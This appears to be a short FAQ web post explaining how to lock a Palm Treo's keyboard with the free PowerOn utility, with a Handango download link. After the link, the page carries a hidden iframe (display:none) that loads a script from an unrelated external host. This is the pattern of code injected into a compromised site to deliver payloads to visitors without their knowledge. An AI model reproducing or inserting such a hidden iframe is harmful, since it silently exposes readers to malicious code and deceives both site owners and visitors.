Can I lock my keyboard like I do with a mobile phone?

Most mobile phones today have a feature that lets you quickly lock the keyboard. This prevents accidental dialing while the phone is in your pocket. The Treo does not have a built in feature that provides this capability.

PowerOn from Xvision provides the ability to lock the Treo's keyboard. It can be configured to disable all buttons that are exposed when the lid is closed, including the power button, from powering on the device. It can also prevent alarms from powering it on. For the Treo, it can be configured to enable/disable when the lid is opened or closed.

    You can download PowerOn from <a class="postlink" target="_blank" href="http://www.handango.com/PlatformProductDetail.jsp?siteId=1&jid=51F11XFEFFFCAB4597CD5FE8B411CE88&productId=24616&optionId=1_1_2&productType=2&catalog=1&txtSearch=poweron§ionId=0&platformId=1&affiliateId=191&programId=11"><b>Handango</b></a> for free.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
